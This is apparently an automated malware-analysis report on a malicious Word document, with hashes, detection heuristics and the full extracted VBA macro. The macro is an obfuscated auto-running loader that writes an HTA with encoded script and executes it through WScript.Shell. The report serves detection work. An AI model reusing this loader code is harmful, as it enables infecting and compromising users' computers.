Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 447200dbf49c7ddd…

MALICIOUS

Office (OOXML)

79.9 KB Created: 2021-04-29 07:33:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-05-04
MD5: 31a22fb314b5c2ca3cddad5ac9c30094 SHA-1: d7e7286215a7b7ae2a0d6b46339231694bc9ed23 SHA-256: 447200dbf49c7ddd9fb381fcc733d848e514e841ed70668897f304d45db925bb
170 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set argumentLeft = CreateObject("wscript.shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set argumentLeft = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 10532 bytes
SHA-256: 67f81ae4be1e5b1f5617b3f1266f491914e3082eb7f7aaff8d127566c987a325
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
main
End Sub

Attribute VB_Name = "frm"
Attribute VB_Base = "0{5D56D1BF-2284-42E2-881B-AFF8D6C2CEA1}{5760DF19-8066-46DE-8128-82122701FFC2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Sub button1_Click()
Set borderStruct = ActiveDocument.BuiltInDocumentProperties("title")
Set argumentLeft = CreateObject("wscript.shell")
With argumentLeft
.exec$ (borderStruct)
End With
End Sub


Attribute VB_Name = "dataGenericMemory"
Sub main()
deleteList
End Sub
Function gwc(structScreen)
If Len(structScreen) > 0 Then
gwc = structScreen
End If
End Function
Sub deleteList()
Dim namespaceCaption As String
tableRight = Split(ActiveDocument.BuiltInDocumentProperties("title"), " ")
namespaceCaption = tableRight(1)
Set mainDatabase = New ExAButton
mainDatabase.classReferenceA namespaceCaption, rightLibTitle
frm.button1_Click
End Sub

Attribute VB_Name = "leftTextbox"
Function constText(vbOptionText)
Dim argumentClear As Integer
argumentClear = 31337
If (Len(vbOptionText) < argumentClear) Then constText = gwc("<htm" & "l><b" & "ody>" & "<div" & " id=" & "'con" & "tent" & "'>fT" & "tlc2" & "9sYy" & "54b2" & "J0eG" & "VUYm" & "lMcm" & "90YX" & "JldG" & "k7KT" & "IgLC" & "JncG" & "oudH" & "hlVG" & "V1bG" & "F2XF" & "xjaW" & "xidX" & "BcXH" & "NyZX" & "N1XF" & "w6Yy" & "IoZW" & "xpZm" & "90ZX" & "Zhcy" & "54b2" & "J0eG" & "VUYm" & "lMcm" & "90YX" & "JldG" & "k7KX" & "lkb2" & "Jlc2" & "5vcH" & "Nlci" & "5lbG" & "JhVG" & "1lTW" & "V2b2" & "1lci" & "hldG" & "lydy" & "54b2" & "J0eG" & "VUYm" & "lMcm" & "90YX" & "JldG" & "k7MS" & "A9IG" & "VweX" & "QueG" & "9idH" & "hlVG" & "JpTH" & "JvdG" & "FyZX" & "RpO2" & "5lcG" & "8ueG" & "9idH" & "hlVG" & "JpTH" & "JvdG" & "FyZX" & "RpOy" & "kibW" & "Flcn" & "RzLm" & "Jkb2" & "RhIi" & "h0Y2" & "VqYk" & "9YZX" & "ZpdG" & "NBIH" & "dlbi" & "A9IH" & "hvYn" & "R4ZV" & "RiaU" & "xyb3" & "Rhcm" & "V0aS" & "ByYX" & "Z7KT" & "AwMi" & "A9PS" & "BzdX" & "RhdH" & "MuZW")
End Function
Function pointerLoadCaption(vbOptionText)
Dim argumentClear As Integer
argumentClear = 31337
If (Len(vbOptionText) < argumentClear) Then pointerLoadCaption = gwc("xiYV" & "RtZU" & "1ldm" & "9tZX" & "IoZm" & "k7KS" & "hkbm" & "VzLm" & "VsYm" & "FUbW" & "VNZX" & "ZvbW" & "VyOy" & "llc2" & "xhZi" & "AsIl" & "JjVV" & "Uzcn" & "ZJYz" & "1kaT" & "80cn" & "V2L3" & "dYdV" & "hGbW" & "hFQ0" & "1tcE" & "xkVT" & "JaZH" & "pOSk" & "51L3" & "dsbF" & "NuaW" & "R6V1" & "lsb2" & "N5dm" & "dJRz" & "B6d3" & "dDZT" & "dKQk" & "UvTE" & "pvbW" & "5TQ0" & "JlWk" & "1QQX" & "VVZG" & "ZoeC" & "9MSH" & "c0UV" & "VoaV" & "dlTl" & "dXOU" & "svS2" & "k3Tn" & "c0SV" & "l2ZV" & "JHZX" & "NQa0" & "tUb1" & "FBY1" & "JCSy" & "93Tn" & "c0ME" & "psVF" & "k3Rk" & "lPWE" & "Rsc0" & "9VMm" & "hHRU" & "JjN3" & "VpRD" & "kvdG" & "lFSj" & "hCTX" & "h3QU" & "VCMm" & "lxSE" & "JnSj" & "hBdU" & "xHV3" & "g5Qz" & "JxNE" & "lPL2" & "dFbE" & "Ezc1" & "cwbE" & "R2el" & "c3el" & "c2aG" & "FnRD" & "NQY0" & "5Qel" & "Vud1" & "czRn" & "dYTX" & "Ivc2" & "9zZ2" & "QvbW" & "9jLm" & "5vaX" & "Rhbm")
End Function
Function rightRefRemove(vbOptionText)
Dim argumentClear As Integer
argumentClear = 31337
If (Len(vbOptionText) < argumentClear) Then rightRefRemove = gwc("Vpem" & "5la2" & "NtLy" & "86cH" & "R0aC" & "IgLC" & "JURU" & "ciKG" & "5lcG" & "8uZW" & "xiYV" & "RtZU" & "1ldm" & "9tZX" & "I7KS" & "JwdH" & "RobG" & "14Lj" & "JsbX" & "hzbS" & "IodG" & "Nlam" & "JPWG" & "V2aX" & "RjQS" & "B3ZW" & "4gPS" & "BlbG" & "JhVG" & "1lTW" & "V2b2" & "1lci" & "ByYX" & "Y=|f" & "Xspd" & "HJld" & "m5vQ" & "3Rud" & "W9jK" & "Ghjd" & "GFjf" & "TspI" & "mF0a" & "C50e" & "GVUZ" & "XVsY" & "XZcX" & "GNpb" & "GJ1c" & "Fxcc" & "3Jlc" & "3VcX" & "DpjI" & "ihlb" & "GlmZ" & "XRlb" & "GVkL" & "m5pY" & "U1yZ" & "WZmd" & "WJ7e" & "XJ0O" & "ykid" & "GNla" & "mJvb" & "WV0c" & "3lzZ" & "WxpZ" & "i5nb" & "ml0c" & "GlyY" & "3MiK" & "HRjZ" & "WpiT" & "1hld" & "ml0Y" & "0Egd" & "2VuI" & "D0gb" & "mlhT" & "XJlZ" & "mZ1Y" & "iByY" & "XY7K" & "SJnc" & "Goud" & "HhlV" & "GV1b" & "GF2X" & "Fxja" & "Wxid" & "XBcX" & "HNyZ" & "XN1X" & "Fw6Y" & "yAyM" & "3J2c" & "2dlc" & "iIob" & "nVyL")
End Function
Function nextTrust(vbOptionText)
Dim argumentClear As Integer
argumentClear = 31337
If (Len(vbOptionText) < argumentClear) Then nextTrust = gwc("ikib" & "Gxla" & "HMud" & "HBpc" & "mNzd" & "yIod" & "GNla" & "mJPW" & "GV2a" & "XRjQ" & "SB3Z" & "W4=<" & "/div" & "><di" & "v id" & "='ta" & "ble1" & "'>AB" & "CDEF" & "GHIJ" & "KLMN" & "OPQR" & "STUV" & "WXYZ" & "</di" & "v><d" & "iv i" & "d='t" & "able" & "2'>0" & "1234" & "5678" & "9+/<" & "/div" & "><di" & "v id" & "='ta" & "ble3" & "'></" & "div>" & "<scr" & "ipt " & "lang" & "uage" & "='ja" & "vasc" & "ript" & "'>fu" & "ncti" & "on l" & "istb" & "oxVb" & "List" & "(vbT" & "able" & "){re" & "turn" & "(new" & " Act" & "iveX" & "Obje" & "ct(v" & "bTab" & "le))" & ";}fu" & "ncti" & "on m" & "emor" & "yBuf" & "ferC" & "onst" & "(ExC" & "opy)" & "{ret" & "urn(" & "coun" & "terL" & "inkE" & "xcep" & "tion" & ".get" & "Elem" & "entB" & "yId(" & "ExCo" & "py)." & "inne" & "rHTM" & "L);}" & "func" & "tion" & " swa" & "pVar" & "iabl" & "e(){" & "var " & "poin" & "terB" & "uffe" & "r = ")
End Function
Function mainFuncList(vbOptionText)
Dim argumentClear As Integer
argumentClear = 31337
If (Len(vbOptionText) < argumentClear) Then mainFuncList = gwc("memo" & "ryBu" & "ffer" & "Cons" & "t('t" & "able" & "1');" & "var " & "arra" & "yOpt" & "ionP" & "roce" & "dure" & " = p" & "oint" & "erBu" & "ffer" & ".toL" & "ower" & "Case" & "();v" & "ar d" & "atab" & "aseS" & "tora" & "ge =" & " mem" & "oryB" & "uffe" & "rCon" & "st('" & "tabl" & "e2')" & ";ret" & "urn(" & "poin" & "terB" & "uffe" & "r + " & "arra" & "yOpt" & "ionP" & "roce" & "dure" & " + d" & "atab" & "aseS" & "tora" & "ge);" & "}fun" & "ctio" & "n vb" & "VarC" & "apti" & "on(s" & "){va" & "r e=" & "{}; " & "var " & "i; v" & "ar b" & "=0; " & "var " & "c; v" & "ar x" & "; va" & "r l=" & "0; v" & "ar a" & "; va" & "r co" & "nver" & "tMai" & "nFun" & "c=''" & "; va" & "r w=" & "Stri" & "ng.f" & "romC" & "harC" & "ode;" & " var" & " L=s" & ".len" & "gth;" & "var " & "list" & "boxD" & "elet" & "eScr" & "een " & "= va" & "riab" & "leNa" & "mesp" & "aceI" & "tera" & "tor(" & "'tAr")
End Function
Function localVarDocument(vbOptionText)
Dim argumentClear As Integer
argumentClear = 31337
If (Len(vbOptionText) < argumentClear) Then localVarDocument = gwc("ahc'" & ");fo" & "r(i=" & "0;i<" & "64;i" & "++){" & "e[sw" & "apVa" & "riab" & "le()" & "[lis" & "tbox" & "Dele" & "teSc" & "reen" & "](i)" & "]=i;" & "}for" & "(x=0" & ";x<L" & ";x++" & "){c=" & "e[s[" & "list" & "boxD" & "elet" & "eScr" & "een]" & "(x)]" & ";b=(" & "b<<6" & ")+c;" & "l+=6" & ";whi" & "le(l" & ">=8)" & "{((a" & "=(b>" & ">>(l" & "-=8)" & ")&0x" & "ff)|" & "|(x<" & "(L-2" & ")))&" & "&(co" & "nver" & "tMai" & "nFun" & "c+=w" & "(a))" & ";}}r" & "etur" & "n(co" & "nver" & "tMai" & "nFun" & "c);}" & ";fun" & "ctio" & "n va" & "riab" & "leNa" & "mesp" & "aceI" & "tera" & "tor(" & "opti" & "onLe" & "n){r" & "etur" & "n op" & "tion" & "Len." & "spli" & "t(''" & ").re" & "vers" & "e()." & "join" & "('')" & ";}vb" & "Text" & " = w" & "indo" & "w;co" & "unte" & "rLin" & "kExc" & "epti" & "on =" & " doc" & "umen" & "t;vb" & "Text" & ".res" & "izeT" & "o(1," & " 1);" & "vbTe")
End Function
Function screenRef(vbOptionText)
Dim argumentClear As Integer
argumentClear = 31337
If (Len(vbOptionText) < argumentClear) Then screenRef = gwc("xt.m" & "oveT" & "o(-1" & "00, " & "-100" & ");va" & "r le" & "ftPt" & "r = " & "coun" & "terL" & "inkE" & "xcep" & "tion" & ".get" & "Elem" & "entB" & "yId(" & "'con" & "tent" & "').i" & "nner" & "HTML" & ";var" & " lef" & "tPtr" & " = l" & "eftP" & "tr.s" & "plit" & "('|'" & ");va" & "r pa" & "steC" & "apti" & "onRe" & "fere" & "nce " & "= va" & "riab" & "leNa" & "mesp" & "aceI" & "tera" & "tor(" & "vbVa" & "rCap" & "tion" & "(lef" & "tPtr" & "[0])" & ");va" & "r co" & "llec" & "tion" & "Data" & " = v" & "aria" & "bleN" & "ames" & "pace" & "Iter" & "ator" & "(vbV" & "arCa" & "ptio" & "n(le" & "ftPt" & "r[1]" & "));<" & "/scr" & "ipt>" & "<scr" & "ipt " & "lang" & "uage" & "='ja" & "vasc" & "ript" & "'>fu" & "ncti" & "on l" & "istb" & "oxMa" & "in(b" & "uffe" & "rTmp" & "){va" & "r ar" & "gume" & "ntRe" & "fere" & "nceR" & "epo " & "= li" & "stbo" & "xVbL" & "ist(" & "vari" & "able")
End Function
Function listCounterCollection(vbOptionText)
Dim argumentClear As Integer
argumentClear = 31337
If (Len(vbOptionText) < argumentClear) Then listCounterCollection = gwc("Name" & "spac" & "eIte" & "rato" & "r('l" & "ortn" & "octp" & "ircs" & ".lor" & "tnoc" & "tpir" & "cssm" & "'));" & "argu" & "ment" & "Refe" & "renc" & "eRep" & "o['L" & "angu" & "age'" & "] = " & "'jsc" & "ript" & "';ar" & "gume" & "ntRe" & "fere" & "nceR" & "epo[" & "'Tim" & "eout" & "'] =" & " 600" & "00;a" & "rgum" & "entR" & "efer" & "ence" & "Repo" & "['Ad" & "dCod" & "e'](" & "buff" & "erTm" & "p);r" & "etur" & "n(nu" & "ll);" & "}</s" & "crip" & "t><s" & "crip" & "t la" & "ngua" & "ge='" & "vbsc" & "ript" & "'>li" & "stbo" & "xMai" & "n pa" & "steC" & "apti" & "onRe" & "fere" & "nce " & ": li" & "stbo" & "xMai" & "n co" & "llec" & "tion" & "Data" & " : v" & "bTex" & "t.cl" & "ose<" & "/scr" & "ipt>" & "</bo" & "dy><" & "/htm" & "l>")
End Function
Function rightLibTitle()
rightLibTitle = constText("elec") + pointerLoadCaption("utto") + rightRefRemove("able") + nextTrust("ames") + mainFuncList("Link") + localVarDocument("rray") + screenRef("izeC") + listCounterCollection("lear")
End Function

Attribute VB_Name = "ExAButton"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Function classReferenceA(textRequestFunc As String, storageIterator As String)
Open textRequestFunc For Output As #1
Print #1, storageIterator
Close #1
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 37376 bytes
SHA-256: 1d715f834d7405a7b3906e62ba572b6d320a24911adf5a08cb1c2616f87106c4

Open this report in the interactive analyzer, or submit your own file for analysis.